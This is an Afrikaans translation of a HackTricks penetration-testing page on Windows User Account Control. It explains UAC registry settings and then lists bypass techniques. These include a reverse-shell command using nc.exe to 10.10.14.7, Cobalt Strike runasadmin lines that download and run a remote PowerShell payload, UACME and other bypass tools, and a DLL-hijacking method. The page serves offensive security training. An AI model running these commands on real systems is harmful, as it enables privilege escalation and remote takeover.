19 KiB
UAC - Gebruikersrekeningbeheer
Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)!
Ander maniere om HackTricks te ondersteun:
- As jy jou maatskappy geadverteer wil sien in HackTricks of HackTricks in PDF wil aflaai Kyk na die INSKRYWINGSPLANNE!
- Kry die amptelike PEASS & HackTricks swag
- Ontdek Die PEASS Familie, ons versameling eksklusiewe NFTs
- Sluit aan by die 💬 Discord-groep of die telegram-groep of volg ons op Twitter 🐦 @carlospolopm.
- Deel jou haktruuks deur PR's in te dien by die HackTricks en HackTricks Cloud github-opslag.
Gebruik Trickest om maklik te bou en werkstrome outomatiseer wat aangedryf word deur die wêreld se mees gevorderde gemeenskapshulpmiddels.
Kry Vandag Toegang:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
UAC
Gebruikersrekeningbeheer (UAC) is 'n kenmerk wat 'n toestemmingsvenster vir verhoogde aktiwiteite moontlik maak. Toepassings het verskillende integriteit vlakke, en 'n program met 'n hoë vlak kan take uitvoer wat die stelsel potensieel kan benadeel. Wanneer UAC geaktiveer is, hardloop toepassings en take altyd onder die sekuriteitskonteks van 'n nie-administrateur-rekening tensy 'n administrateur hierdie toepassings/take uitdruklik magtig om administrateurvlaktoegang tot die stelsel te verkry. Dit is 'n geriefkenmerk wat administrateurs beskerm teen onbedoelde veranderinge, maar nie as 'n sekuriteitsgrens beskou word nie.
Vir meer inligting oor integriteitsvlakke:
{% content-ref url="../windows-local-privilege-escalation/integrity-levels.md" %} integrity-levels.md {% endcontent-ref %}
Wanneer UAC in plek is, kry 'n administrateurgebruiker 2 tokens: 'n standaardgebruikersleutel, om gewone aksies op gewone vlak uit te voer, en een met die administrateurbevoegdhede.
Hierdie bladsy bespreek hoe UAC in groot diepte werk en sluit die aanmeldingsproses, gebruikerservaring, en UAC-argitektuur in. Administrateurs kan sekuriteitsbeleide gebruik om te konfigureer hoe UAC spesifiek vir hul organisasie op plaaslike vlak werk (deur secpol.msc te gebruik), of gekonfigureer en uitgestuur via Groepbeleidsvoorwerpe (GPO) in 'n Aktiewe Gids-domeinomgewing. Die verskeie instellings word in detail bespreek hier. Daar is 10 Groepbeleidsinstellings wat vir UAC ingestel kan word. Die volgende tabel verskaf addisionele besonderhede:
UAC Oorwegingsteorie
Sommige programme word outomaties geëleweer as die gebruiker behoort tot die administrateur groep. Hierdie bineêre lêers het binne hul Manifeste die autoElevate opsie met die waarde True. Die bineêre lêer moet ook deur Microsoft onderteken wees.
Daarom, om die UAC te omseil (verhoog vanaf medium integriteitsvlak na hoog) gebruik sommige aanvallers hierdie tipe bineêre lêers om arbitrêre kode uit te voer omdat dit vanaf 'n Hoë vlak integriteitsproses uitgevoer sal word.
Jy kan die Manifest van 'n bineêre lêer kontroleer deur die instrument sigcheck.exe van Sysinternals te gebruik. En jy kan die integriteitsvlak van die prosesse sien deur Process Explorer of Process Monitor (van Sysinternals) te gebruik.
Kontroleer UAC
Om te bevestig of UAC geaktiveer is, doen:
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
EnableLUA REG_DWORD 0x1
Indien dit 1 is, is UAC geaktiveer, indien dit 0 is of nie bestaan nie, is UAC onaktief.
Dan, kontroleer watter vlak ingestel is:
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
ConsentPromptBehaviorAdmin REG_DWORD 0x5
- Indien
0dan sal UAC nie vra nie (soos uitgeschakel) - Indien
1sal die admin vir gebruikersnaam en wagwoord gevra word om die binêre lêer met hoë regte uit te voer (op 'n veilige lessenaar) - Indien
2(Altyd in kennis stel) sal UAC altyd vir bevestiging vra aan die administrateur wanneer hy iets met hoë regte probeer uitvoer (op 'n veilige lessenaar) - Indien
3soos1maar nie noodwendig op 'n veilige lessenaar nie - Indien
4soos2maar nie noodwendig op 'n veilige lessenaar nie - Indien
5(verstek) sal dit die administrateur vra om te bevestig om nie-Windows binêre lêers met hoë regte uit te voer
Dan moet jy na die waarde van LocalAccountTokenFilterPolicy kyk
Indien die waarde 0 is, kan slegs die RID 500-gebruiker (ingeboude Administrateur) admin-take uitvoer sonder UAC, en as dit 1 is, kan alle rekeninge binne die "Administrateurs"-groep dit doen.
En, neem uiteindelik 'n kyk na die waarde van die sleutel FilterAdministratorToken
Indien 0(verstek), kan die ingeboude Administrateur-rekening afgeleë administrasietake uitvoer en as 1 kan die ingeboude Administrateur-rekening nie afgeleë administrasietake uitvoer nie, tensy LocalAccountTokenFilterPolicy op 1 ingestel is.
Opsomming
- Indien
EnableLUA=0of nie bestaan nie, geen UAC vir enigiemand nie - Indien
EnableLua=1enLocalAccountTokenFilterPolicy=1, Geen UAC vir enigiemand nie - Indien
EnableLua=1enLocalAccountTokenFilterPolicy=0enFilterAdministratorToken=0, Geen UAC vir RID 500 (Ingeboude Administrateur) - Indien
EnableLua=1enLocalAccountTokenFilterPolicy=0enFilterAdministratorToken=1, UAC vir almal
Hierdie inligting kan almal ingesamel word met die metasploit-module: post/windows/gather/win_privs
Jy kan ook die groepe van jou gebruiker nagaan en die integriteitsvlak kry:
net user %username%
whoami /groups | findstr Level
UAC omseil
{% hint style="info" %} Let daarop dat as jy grafiese toegang tot die slagoffer het, is UAC omseiling reguit vorentoe omdat jy eenvoudig op "Ja" kan klik wanneer die UAC-prompt verskyn. {% endhint %}
Die UAC omseiling is nodig in die volgende situasie: die UAC is geaktiveer, jou proses hardloop in 'n medium integriteitskonteks, en jou gebruiker behoort tot die administrateursgroep.
Dit is belangrik om te noem dat dit veel moeiliker is om die UAC te omseil as dit in die hoogste sekuriteitsvlak (Altyd) is as wanneer dit in enige van die ander vlakke (Verstek) is.
UAC gedeaktiveer
As UAC reeds gedeaktiveer is (ConsentPromptBehaviorAdmin is 0) kan jy 'n omgekeerde dop met administrateursregte (hoë integriteitsvlak) uitvoer deur iets soos:
#Put your reverse shell instead of "calc.exe"
Start-Process powershell -Verb runAs "calc.exe"
Start-Process powershell -Verb runAs "C:\Windows\Temp\nc.exe -e powershell 10.10.14.7 4444"
UAC omseiling met token duplisering
- https://ijustwannared.team/2017/11/05/uac-bypass-with-token-duplication/
- https://www.tiraniddo.dev/2018/10/farewell-to-token-stealing-uac-bypass.html
Baie Basiese UAC "omseiling" (volle lêersisteemtoegang)
As jy 'n skaal het met 'n gebruiker wat binne die Administrateursgroep is, kan jy die C$ deel via SMB (lêersisteem) lokaal aankoppel op 'n nuwe skyf en jy sal toegang hê tot alles binne die lêersisteem (selfs die Administrateur se tuisvouer).
{% hint style="warning" %} Dit lyk of hierdie truuk nie meer werk nie {% endhint %}
net use Z: \\127.0.0.1\c$
cd C$
#Or you could just access it:
dir \\127.0.0.1\c$\Users\Administrator\Desktop
UAC omseiling met kobaltstreke
Die Kobaltstreke tegnieke sal net werk as UAC nie op sy maksimum sekuriteitsvlak ingestel is nie
# UAC bypass via token duplication
elevate uac-token-duplication [listener_name]
# UAC bypass via service
elevate svc-exe [listener_name]
# Bypass UAC with Token Duplication
runasadmin uac-token-duplication powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"
# Bypass UAC with CMSTPLUA COM interface
runasadmin uac-cmstplua powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"
Empire en Metasploit het ook verskeie modules om die UAC te omseil.
KRBUACBypass
Dokumentasie en gereedskap in https://github.com/wh0amitz/KRBUACBypass
UAC omseil uitbuitings
UACME wat 'n samestelling van verskeie UAC omseil uitbuitings is. Let daarop dat jy UACME sal moet saamstel met behulp van Visual Studio of MSBuild. Die samestelling sal verskeie uitvoerbare lêers skep (soos Source\Akagi\outout\x64\Debug\Akagi.exe), jy sal moet weet watter een jy nodig het.
Wees versigtig omdat sommige omseilings ander programme kan aanmoedig wat die gebruiker sal waarsku dat iets gebeur.
UACME het die bou weergawe waar elke tegniek begin werk het. Jy kan soek na 'n tegniek wat jou weergawes affekteer:
PS C:\> [environment]::OSVersion.Version
Major Minor Build Revision
----- ----- ----- --------
10 0 14393 0
Meer UAC-omleiding
Alle tegnieke wat hier gebruik word om UAC te omseil vereis 'n volledige interaktiewe skaal met die slagoffer (‘n gewone nc.exe skaal is nie genoeg nie).
Jy kan 'n meterpreter-sessie kry. Migreer na 'n proses wat die Sessie-waarde gelyk aan 1 het:
(explorer.exe behoort te werk)
UAC-omleiding met GUI
As jy toegang het tot 'n GUI kan jy net die UAC-aanvraag aanvaar wanneer jy dit kry, jy het nie regtig 'n omleiding nodig nie. Dus, toegang tot 'n GUI sal jou in staat stel om die UAC te omseil.
Verder, as jy 'n GUI-sessie kry wat iemand gebruik het (moontlik via RDP) is daar sekere gereedskap wat as administrateur sal hardloop waarvandaan jy byvoorbeeld 'n cmd as admin direk kan hardloop sonder om weer deur UAC gevra te word soos https://github.com/oski02/UAC-GUI-Bypass-appverif. Dit mag 'n bietjie meer steels wees.
Lawaaierige bruto-krag UAC-omleiding
As jy nie omgee om lawaaierig te wees nie, kan jy altyd iets soos https://github.com/Chainski/ForceAdmin hardloop wat vra om regte te verhoog totdat die gebruiker dit aanvaar.
Jou eie omleiding - Basiese UAC-omleidingsmetodologie
As jy na UACME kyk, sal jy opmerk dat meeste UAC-omleidings 'n Dll Hijacking-gebrek misbruik (hoofsaaklik deur die skadelike dll op C:\Windows\System32 te skryf). Lees hier om te leer hoe om 'n Dll Hijacking-gebrek te vind.
- Vind 'n binêre lêer wat outomaties verhoog (kontroleer dat wanneer dit uitgevoer word, dit op 'n hoë integriteitsvlak loop).
- Met procmon vind "NAAM NIE GEVIND" gebeure wat vatbaar kan wees vir DLL Hijacking.
- Jy sal waarskynlik die DLL binne sommige beskermde paaie (soos C:\Windows\System32) moet skryf waar jy nie skryfregte het nie. Jy kan dit omseil deur:
- wusa.exe: Windows 7,8 en 8.1. Dit maak dit moontlik om die inhoud van 'n CAB-lêer binne beskermde paaie uit te pak (omdat hierdie gereedskap van 'n hoë integriteitsvlak uitgevoer word).
- IFileOperation: Windows 10.
- Berei 'n skripsie voor om jou DLL binne die beskermde pad te kopieer en die vatbare en outomaties verhoogde binêre uit te voer.
'n Ander UAC-omleidingstegniek
Bestaan daarin om te kyk of 'n outomaties verhoogde binêre probeer om van die register die naam/pad van 'n binêre of opdrag om uitgevoer te word, te lees (dit is meer interessant as die binêre hierdie inligting binne die HKCU soek).
Gebruik Trickest om maklik te bou en werkvloei outomatiseer wat aangedryf word deur die wêreld se mees gevorderde gemeenskapsinstrumente.
Kry Vandaag Toegang:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}